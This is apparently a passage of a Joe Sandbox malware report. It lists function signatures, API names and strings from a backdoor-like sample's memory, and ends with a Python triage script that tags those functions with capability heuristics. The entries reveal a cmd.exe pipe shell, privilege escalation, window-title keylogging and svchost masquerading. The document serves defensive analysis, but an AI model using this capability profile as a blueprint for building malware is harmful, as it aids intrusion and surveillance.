                                                                                    • API ID: Process$AddressHandleProc$CloseLibraryLoadThread$CreateOpen$ContextCurrentProcess32$AllocCodeDirectoryExitFirstMemoryModuleNextObjectResumeSingleSleepSnapshotSystemTerminateToolhelp32UserVersionVirtualWaitWritewsprintf
                                                                                    • String ID: %ssvchost.exe -k SystemNetworkService$@$Control$DeleteProcThreadAttributeList$Dispatch$InitializeProcThreadAttributeList$UpdateProcThreadAttribute$WTSEnumerateSessionsW$WTSFreeMemory$Wtsapi32.dll$kernel32.dll
                                                                                    • API String ID: 257342752-1674703022
                                                                                    • Opcode ID: 49290ec657bfe98c2b9f6aa29abe0264a29374fab45202733a7c48c8ccdc69bd
                                                                                    • Instruction ID: 17f5ef8208e27e524228d61143691c39c7044459d34c821e4b467bfa74ea8db3
                                                                                    • Opcode Fuzzy Hash: 49290ec657bfe98c2b9f6aa29abe0264a29374fab45202733a7c48c8ccdc69bd
                                                                                    • Instruction Fuzzy Hash: FF22A233301A408AEB56EB35F8683AAB7A9FBC57C4F445129DA4A43BE4EF39C515C704
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CreateInternetThread$ObjectOpenSingleWait$CommandFileLineModuleNamelstrcmpi
                                                                                    • String ID: AppService$Mozilla/4.0 (compatible)$SystemNetworkService$netsvcs$svchost.exe
                                                                                    • API String ID: 949907800-553284339
                                                                                    • Opcode ID: 94f1a95958b2879f0eb2bdfb5b228bb3b2da66d3d6364c05f4f9ad9e88ee521e
                                                                                    • Instruction ID: 7f413ee52e9d73a73162038efb5b90a232cdf87eef19e68004ed618f51bed061
                                                                                    • Opcode Fuzzy Hash: 94f1a95958b2879f0eb2bdfb5b228bb3b2da66d3d6364c05f4f9ad9e88ee521e
                                                                                    • Instruction Fuzzy Hash: AF616022605B4189FB26EB31B96C35AA798FBC9BD4F842129D94E46BE4DF3DC014C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.809176620.0000024B7C9A0000.00000040.00000001.sdmp, Offset: 0000024B7C9A0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 8efb2fe887b23dcbf2071df45b498d4b0a216b595415067a83ffe35f8033a6fe
                                                                                    • Instruction ID: c282bd005d5da70a69f8d7246fe02f7f39198120d02a13b570adf36933b8cef5
                                                                                    • Opcode Fuzzy Hash: 8efb2fe887b23dcbf2071df45b498d4b0a216b595415067a83ffe35f8033a6fe
                                                                                    • Instruction Fuzzy Hash: DAD1A931218A058BE7EEDE39C4993BAB3E1FBD5306F54552DD48BC3586DF24E842C681
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Close$CreateValuewsprintf$CurrentErrorEventHandleLastOpenQueryThread
                                                                                    • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 709688788-2346361075
                                                                                    • Opcode ID: 41c290a2661ca398f0845d53f402d7983a9f4a8f9d161a995b5b27ee8e266ee2
                                                                                    • Instruction ID: d7bed04d1a1800c49c94b912b90bbbf123cfc11e0b2919f1a3ffdec990d50384
                                                                                    • Opcode Fuzzy Hash: 41c290a2661ca398f0845d53f402d7983a9f4a8f9d161a995b5b27ee8e266ee2
                                                                                    • Instruction Fuzzy Hash: CF415C73204B8586EB21DF65F59839AFBA8F7C8BD0F405115EA8943B98DF79C168CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: QueryValue$CloseOpen$wsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 3581893009-1865207932
                                                                                    • Opcode ID: e4216eebd3811767217d7f8fa42a0fbedc604489aaa92369a2032f0a656ca1e6
                                                                                    • Instruction ID: 2793fc6034c0dbda97a7cd0c9d61391d84fe33e3bf8157fd3aed1caec564165f
                                                                                    • Opcode Fuzzy Hash: e4216eebd3811767217d7f8fa42a0fbedc604489aaa92369a2032f0a656ca1e6
                                                                                    • Instruction Fuzzy Hash: DE41C433214A8086DB619F70F49879EF7A8F7C9BC0F486119EA9A47AD9DF39C514CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressAdjustLibraryLoadPrivilegeProc
                                                                                    • String ID: RtlAdjustPrivilege$ntdll.dll
                                                                                    • API String ID: 2041504798-64178277
                                                                                    • Opcode ID: db2a72ec1006c7efc9c8359562ea7c900fdcfac16ce5a9aec0e7e2db51f45424
                                                                                    • Instruction ID: 904959bf2d5a1f3259202f796974edae1ebc7568ef14651d75eac3ee803a5b37
                                                                                    • Opcode Fuzzy Hash: db2a72ec1006c7efc9c8359562ea7c900fdcfac16ce5a9aec0e7e2db51f45424
                                                                                    • Instruction Fuzzy Hash: 07E06533716601C7EA19DF36E8956957364E7D57C0F885029D50A436D0DF39C6A9CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 592884611-0
                                                                                    • Opcode ID: 14d0c5f47cbed084a160ebf99d91352bc093908ee40379c1256aa4e37cac371a
                                                                                    • Instruction ID: e4527ef9168e52a9ae3d61b53fed7e516ff6cad74799605ee7c6abdd110186a2
                                                                                    • Opcode Fuzzy Hash: 14d0c5f47cbed084a160ebf99d91352bc093908ee40379c1256aa4e37cac371a
                                                                                    • Instruction Fuzzy Hash: 6C112A33204B8486EB21DB21F45835AB7A8F7C9BC0F545225DA9D47B98EF39C559CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ConsoleCountCtrlHandlerParametersProcessShutdownSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 4201418100-0
                                                                                    • Opcode ID: 797d003a799a7b3362cf51119329a3c2813fa8145dcca39bd4f8ef1c5edbf09c
                                                                                    • Instruction ID: be4dd10aeba9b506f262a136fa87806c9251ba1858f0b9aa14f82b2d0ee288cd
                                                                                    • Opcode Fuzzy Hash: 797d003a799a7b3362cf51119329a3c2813fa8145dcca39bd4f8ef1c5edbf09c
                                                                                    • Instruction Fuzzy Hash: 88E01222A20600C3F70AEB71EDAD359A65AE7EE7C1F884135C00785AE0DF2DC5AAC311
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 14f1d82d82a540ef03adf27bcd25e030a721660095f7997b8c0c56de99b93bc0
• Instruction ID: 95351d76e1738c0405ea6723544291b0beef103a8e9ca3b28163d77181a5dc18
• Instruction Fuzzy Hash: 3CE0865270110183FF06BBF3984E36496E95BC47C0F048824D80546AD1DB28C4A18350
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: Startup_onexit
• String ID:
• API String ID: 3012808385-0
• Opcode ID: 412cf2d83e2b313f5d0750eb9ff5afe8794e91e36867a5953797e847cb732bc0
• Instruction ID: f1461b5ff4a42239ad451ed6bf36678faeadec0111046e25fa423d23a54318a6
• Instruction Fuzzy Hash: 93F01237214A84DAE712DF34E459699B368F78D784F849411E94D47B95DF3CD125CB00
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.809176620.0000024B7C9A0000.00000040.00000001.sdmp, Offset: 0000024B7C9A0000, based on PE: false
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 9869b97ec70a38c37ede3072b41e1068fb460917c8c4f50d93b484b6020e7d47
• Instruction ID: 65c47a1e96f885ac6301e83002c01536bd2b9a94da7e8f344e3c8eb529878a20
• Instruction Fuzzy Hash: D331A03160CB588FEBCAEE28945976AB7E1EBA4311F00055EA48ED3282DF64E901C781
• Uniqueness Score: -1.00%

Non-executed Functions

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: CloseHandle$Create$Pipe$DirectoryEventInfoObjectProcessSingleSleepStartupSystemWaitlstrcat
• String ID: $\cmd.exe
• API String ID: 3838570663-3339350558
• Opcode ID: 09b7ce65b4cc2eb8b3b3f58e96f0269d7ff97d1481b56506d86a65aa62fe847d
• Instruction ID: a91ab893271775d3efaa3af5b81f05390c1a7b6c965630e45e7073ba9606879f
• Instruction Fuzzy Hash: 07812733215B808AE752DF71E85869DB7B8F7C8B88F501219DA8D43BA8DF39C569C740
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: FileFindFirstlstrlenwsprintf
• String ID: %s%s%s$%s%s*.*$l$list<T> too long
• API String ID: 4287520746-3350904371
• Opcode ID: 8912dc01a5bbab821f4875a34c9c48f64b12a23d423a8dd6d5616daf676b2a8f
• Instruction ID: d59d7eeed5e2cc331852d5f91ee3a3ef384abb9882201b89e3fc5174ae24f24c
• Instruction Fuzzy Hash: 4BC1BF37204A8481EA12EB61F4683AAE3A8F7C5BE4F445216DB9E47BE9DF78C155C700
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: Service$CloseHandleLocal$Free$AllocEnumOpenServicesStatus$ConfigManagerQuery
• String ID: -k netsvcs
• API String ID: 2067902596-1604415765
• Opcode ID: bc16f9542be6cb73d44510a536ae53fbdd7c051d4607f2977742da424336212e
• Instruction ID: 0d67a270aa92b0d4c5f9ae273227b196365569f7601df1ec62e0b594eb7d5671
• Instruction Fuzzy Hash: 37715A33205B418AEB66DF62B45835EFBA9F7C9BC0F445129DA8A43B98DF39C554CB00
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: lstrcat$Filelstrcpy$CreateDirectoryErrorFindLastlstrcmp$CopyFirstNext
• String ID:
• API String ID: 2173410017-0
• Opcode ID: db4d12520346ddeb144483ae4b36c57262f804e356013a81b405ff8b4fc44772
• Instruction ID: 72f7323dcea1df1aad820382638f9c5125ab8848f1f14616e256e2b4fc1ae289
• Instruction Fuzzy Hash: 3451AD23300A85D9EB22EF31ED5C3DAA7A9F7D97C8F849115C50D869E8EF28C219C700
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: CloseOpenQueryValue$Enum$wsprintf
• String ID: SOFTWARE\Classes\CLSID\%s
• API String ID: 1512917468-1183003970
• Opcode ID: dda6cf140eeb3d3e7fe3390d9d818ec4ccc4efd47133e7857fb9fd68d8e7d55c
• Instruction ID: bc8a203d2a0aa81bd5de9a56c717de6deedb194a22f67e31c23ab7ba5c459487
• Instruction Fuzzy Hash: 32916A33208B8186EB21DF25F85879EF7A8F7C97D4F40111AEA9947A98EF79C514CB00
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
• String ID: <$<$`
• API String ID: 1949328396-2220807966
• Opcode ID: 964ccee185e789bb3186dfb71f77e9580d6f7b358ddcbe5aa23466650843fe61
• Instruction ID: 1e61a7862140224f8b27fd191b3b89c3c01abb95df73ab30e25267cf43ceccf5
• Instruction Fuzzy Hash: 66416633610B9082E759CF34A46879D76A9F788F88F18612AEB1846BC8CF79C451CB40
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: Desktop$Thread$CloseInformationObjectUserVirtualkeybd_event$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpi
• String ID:
• API String ID: 1082231092-0
• Opcode ID: e56a73ee7c23307f60af2bb8df704ad2fbc99a4d8c96a4aaa103ad3efe97439c
• Instruction ID: b643e736b271364f43531caeef9d53fe47a3b28e4676a1e745cae70a261d4c4a
• Instruction Fuzzy Hash: 4F412573B006948BE316EB35F96CB6DF769EBC6BC8F049215E90546AD4DB38C851C700
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: Create$Compatible$Window$DesktopEventMonitor$CloseCursorDisplayEnumFromHandleInfoLoadObjectReleaseSettingsSingleWait_invalid_parameter_noinfo
• String ID:
• API String ID: 2947445764-0
• Opcode ID: 6c2e6c7e15d31867e4bfff414c3be7fe13dbb01ff193d9f9c6558bdd1275d659
• Instruction ID: 6fcff12eb5bab6b35ed64aab9014db7e43a098b4525258da988a07cc898b8736
• Instruction Fuzzy Hash: B3214833205B8082E7159B65F554789B7A9F785780F10522AEB8903BA4DF39D074CB00
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: QueryValue$wsprintf$FileInfoVersion$Size
• String ID: \StringFileInfo\%08lx\CompanyName$\StringFileInfo\%08lx\FileDescription$\StringFileInfo\%08lx\ProductVersion$\VarFileInfo\Translation
• API String ID: 2317827058-2104189134
• Opcode ID: 354f63773257b1beebd2677b0efc278238e69b90cde0f85435079b1b81b1e1cb
• Instruction ID: d4488d6ae67f70aeef75e7075012ba5a5ee8798eed97673aed296bca6c286a40
• Instruction Fuzzy Hash: 4B51B027304A8489EB22DF25F4583AAB7A4F7C5BC4F445116EA8E83AE4EF3DC519C700
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleep_invalid_parameter_noinfowave
• String ID: |
• API String ID: 3963561435-2343686810
• Opcode ID: 91a27b4a1239f5f4d3d5cb5ef6ad1dce6f0df01996c6ccc63c6d7ac345f79a5a
• Instruction ID: c259aa505f5e23633af306ad59878eaf9153504beacc00581a8f2a576fd10869
• Instruction Fuzzy Hash: 00317A33205B8082EB12DB75F95974AB7A9F7C67D4F10522AEA9943BE4DF39C0A4C740
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: CriticalSection$EnterLeave$ErrorFreeHeapLast$send
• String ID:
• API String ID: 3617958714-0
• Opcode ID: 1e8952f0f5a339e1106fafc25898707f3444e0f8551e1178c98ecadb8a89b98c
• Instruction ID: 65de5f3f456617b8b39c3af261b4be9c1d17c2bc2b9dce225e0cf93ad53f06df
• Instruction Fuzzy Hash: 24416937201A4086E765CB22F56879AB7B8F799BD0F144129CF9E83B90EF39D4A5C301
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: _invalid_parameter_noinfo
• String ID: +$-$f$p
• API String ID: 3215553584-588565063
• Opcode ID: e2946a4514b7f479ca24c668fcf9bbb0cde032c8894c0529b080685878dc6b83
• Instruction ID: 7d0385ef6c638e2ff7d93b7fe6935e5097676e37e7ebeed375b43356656993b4
• Instruction Fuzzy Hash: 1012C82371815186FB32BB15E16E36AF6AEF3C07E4FD84A12E69507EC4C739C5A08B54
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: Window$ForegroundLocalTextTimelstrcatwsprintf
• String ID: [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:]
• API String ID: 67575802-2837871436
• Opcode ID: c5a50a4e454de03d5974ffda851e0112d8c17b32a017683c7d2d5897f3aa73a1
• Instruction ID: da5589b1da16a9d648805e8a969ead0396311df84f562e3d78da1f402cef671a
• Instruction Fuzzy Hash: A2518B37204B8086EB619F21F0583AAF7A5F3C5BD0F445116DA8A43BD8EB7CC15ACB50
• Uniqueness Score: -1.00%

• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
• API ID: Token$CloseHandleProcess$AddressAdjustCurrentDuplicateInformationLibraryLoadOpenPrivilegeProc
• String ID:
• API String ID: 3800857282-0
• Opcode ID: 3cdb79d2e82c80578a60607dd41fcd483eddf174bc6b123a3a58a5ea1a2a2239
• Instruction ID: 29fa54fb9c2dff05b53cae3f88c73a98a93f2100ad1f5ab8dde5bdeb96ed64e1
• Instruction Fuzzy Hash: C8117033208A8586EB11DFA1F85875BF778F7C8BD4F045119EA8947AA8DFB9C558CB00
• Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnumValue$CloseInfoOpenQuery
                                                                                    • String ID:
                                                                                    • API String ID: 2078201404-0
                                                                                    • Opcode ID: f7007b3bc2798b3a41bbe3608d341f6c812dcbdb399c756e295e247f5bd2a31c
                                                                                    • Instruction ID: fbfbe3d24cfbc5313f9d752afa3bde16f0b0583f895eb3004d89b38359096cec
                                                                                    • Opcode Fuzzy Hash: f7007b3bc2798b3a41bbe3608d341f6c812dcbdb399c756e295e247f5bd2a31c
                                                                                    • Instruction Fuzzy Hash: 70B15633B10A408EEB12EF71E59469DB7B9F788BD8F401229EE4A67B98DB34C515C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _set_statfp
                                                                                    • String ID:
                                                                                    • API String ID: 1156100317-0
                                                                                    • Opcode ID: 5775c5d13c4e64004754ee0314eb150a4182c69c28ee82591c9a2c52d77396f5
                                                                                    • Instruction ID: f6ca50ea404e57bfdea6072f85456b614ad7a3908578a248aeb9b9f78e007d68
                                                                                    • Opcode Fuzzy Hash: 5775c5d13c4e64004754ee0314eb150a4182c69c28ee82591c9a2c52d77396f5
                                                                                    • Instruction Fuzzy Hash: 5D11A063650A01C5FA6B112CE48E3B995896BE63F0F184A24F9E607FD7DB1BCC60C310
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_taskException$FileHeaderRaiseThrow
                                                                                    • String ID:
                                                                                    • API String ID: 1107440535-0
                                                                                    • Opcode ID: 08e890c52bc48befd5332d8d697b5584f560ef112cc41b2cc78d90b902c3ca8f
                                                                                    • Instruction ID: f651300ad88c776b89c8f117c9cc4543a78638c0a6146689c5d2c50b78278e40
                                                                                    • Opcode Fuzzy Hash: 08e890c52bc48befd5332d8d697b5584f560ef112cc41b2cc78d90b902c3ca8f
                                                                                    • Instruction Fuzzy Hash: F701C473642B5084EF16EB71E0593A9A3ADA7C47F4F105B21E97D06BD5EF29C1618240
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DesktopThread$CloseCurrentInformationObjectUser
                                                                                    • String ID:
                                                                                    • API String ID: 2068333509-0
                                                                                    • Opcode ID: 2855c0745dc3fe0bbaa13e106c2f61881320f9d356a01525ebe49a3d4c4c94ac
                                                                                    • Instruction ID: 5e902251e15017608e9b26d447185cdf6b5ba861cf6c53d8358ce9a63a9181e5
                                                                                    • Opcode Fuzzy Hash: 2855c0745dc3fe0bbaa13e106c2f61881320f9d356a01525ebe49a3d4c4c94ac
                                                                                    • Instruction Fuzzy Hash: 65014F32315B85C6EA62DB62F9183AAA3A8F7CDBC0F401425DA5A47B94DF3DC0558700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                    • String ID:
                                                                                    • API String ID: 118556049-0
                                                                                    • Opcode ID: f38b30f50d4b29fc3a6b270e24c7fc43ab540329ff345040f5d556fd8d01ae4e
                                                                                    • Instruction ID: 2e3ff3c9570660316dfc2783f841c07b13be60123d83438d3d728bf499798d7c
                                                                                    • Opcode Fuzzy Hash: f38b30f50d4b29fc3a6b270e24c7fc43ab540329ff345040f5d556fd8d01ae4e
                                                                                    • Instruction Fuzzy Hash: 0621BEB3600B8099EA19AB75F55838DA268B7887F0F549728DB7D037D9DB30C0618300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3604237281-0
                                                                                    • Opcode ID: ce6523f493ae27f2cadbe02f6ee39b5b7731bb75727c7d156176c859cec8e6e0
                                                                                    • Instruction ID: 09f61e9846867082b158120667d3bbe52a5272e4b6fabe15669bd74e8c2eda68
                                                                                    • Opcode Fuzzy Hash: ce6523f493ae27f2cadbe02f6ee39b5b7731bb75727c7d156176c859cec8e6e0
                                                                                    • Instruction Fuzzy Hash: E2212223B1578082F7128B2DA459B29E764F7C97D8F105314EA9902BD0DB39C068C704
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 2079671238-0
                                                                                    • Opcode ID: c01c08db0211a0849afbd09bd011f717ce6583b3c6389de65e867f292b032ef4
                                                                                    • Instruction ID: e8e36420bf3ed55e7feb7a8399bbe55bc96f56106746e30d9ab1ea6c115b7694
                                                                                    • Opcode Fuzzy Hash: c01c08db0211a0849afbd09bd011f717ce6583b3c6389de65e867f292b032ef4
                                                                                    • Instruction Fuzzy Hash: 0AF0EC36212B0585EB02DF75E8682587368FBD9BD4F540122D91D877E4DF39C5A6C350
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
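The function-similarity entries above are easier to triage when the "API ID" name fragments are turned into capability hints (for example, a function whose ID carries Token, Adjust, Privilege and Duplicate is worth a look before one built only from _set_statfp). The script below is an added example for this report page, not Joe Sandbox code and not code recovered from the sample. It parses entries in the label-plus-bullet layout of this table, tokenizes the API ID and tags each function with heuristic capability names. The tokenization rule ("$" separates groups, CamelCase joins fragments), the capability map and the three embedded entries (copied from this section as constructed sample input) are assumptions for illustration; a tag only says that those fragment names co-occur in the ID, not that the behaviour is confirmed.

```python
"""Tag Joe Sandbox function-similarity entries with capability hints.

Added example; not Joe Sandbox code. Layout, tokenization rule and the
capability map are assumptions made for this illustration.
"""
import re
from collections import Counter

# Constructed sample: three entries copied from the similarity table above.
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
Yara matches
Similarity
• API ID: Window$ForegroundLocalTextTimelstrcatwsprintf
• String ID: [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:]
• API String ID: 67575802-2837871436
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
Similarity
• API ID: Token$CloseHandleProcess$AddressAdjustCurrentDuplicateInformationLibraryLoadOpenPrivilegeProc
• String ID:
• API String ID: 3800857282-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• String ID:
• API String ID: 3604237281-0
Uniqueness

Uniqueness Score: -1.00%
"""

# "Key: value" bullet; the lazy key stops at the first colon, so the
# "Source File: ..., Offset: ..., based on PE: true" line keeps its tail.
FIELD_RE = re.compile(r"^\s*[•*-]?\s*([A-Za-z][A-Za-z ]*?):\s*(.*?)\s*$")
LABELS = {"APIs", "Memory Dump Source", "Yara matches", "Similarity", "Uniqueness"}

# Assumed heuristic map: fragment names that must all appear in the API ID.
CAPABILITY_HINTS = {
    "token privilege adjustment": {"Token", "Adjust", "Privilege"},
    "token duplication": {"Token", "Duplicate"},
    "foreground window title capture": {"Window", "Foreground", "Text"},
    "registry value enumeration": {"Enum", "Value", "Query"},
    "file creation and write": {"File", "Create", "Write"},
    "desktop/user-object query": {"Desktop", "User", "Object"},
}


def parse_entries(text):
    """One dict per function; a new entry starts at each 'Memory Dump Source'."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            entries.append(cur)
            continue
        if cur is None or not line or line in LABELS:
            continue
        m = FIELD_RE.match(line)
        if m:
            cur[m.group(1)] = m.group(2)
    return entries


def api_tokens(api_id):
    """Split an API ID into name fragments (assumed '$' groups + CamelCase)."""
    toks = []
    for group in api_id.split("$"):
        toks.extend(re.findall(r"[A-Z][a-z]*|[a-z]+|[0-9]+", group))
    return toks


def classify(entry):
    """Capability hints for one entry, from its API ID and String ID."""
    toks = set(api_tokens(entry.get("API ID", "")))
    caps = [name for name, need in CAPABILITY_HINTS.items() if need <= toks]
    s = entry.get("String ID", "")
    if "%" in s and "Title" in s:  # printf-style title/timestamp record
        caps.append("title/timestamp log format string")
    return caps


def analyze(text):
    """Parsed entries with a 'capabilities' list attached to each."""
    out = []
    for e in parse_entries(text):
        e = dict(e)
        e["capabilities"] = classify(e)
        out.append(e)
    return out


def capability_counts(text):
    """How many functions carry each hint, for a quick report-wide summary."""
    c = Counter()
    for e in analyze(text):
        c.update(e["capabilities"])
    return c


if __name__ == "__main__":
    for e in analyze(SAMPLE):
        print(e["API ID"], "->", ", ".join(e["capabilities"]) or "(no hint)")
```

Pipe the full similarity table into analyze() instead of SAMPLE to rank the report's functions by hint count; entries with an empty hint list (CRT helpers such as _set_statfp or Concurrency::cancel_current_task) can be skipped during manual review.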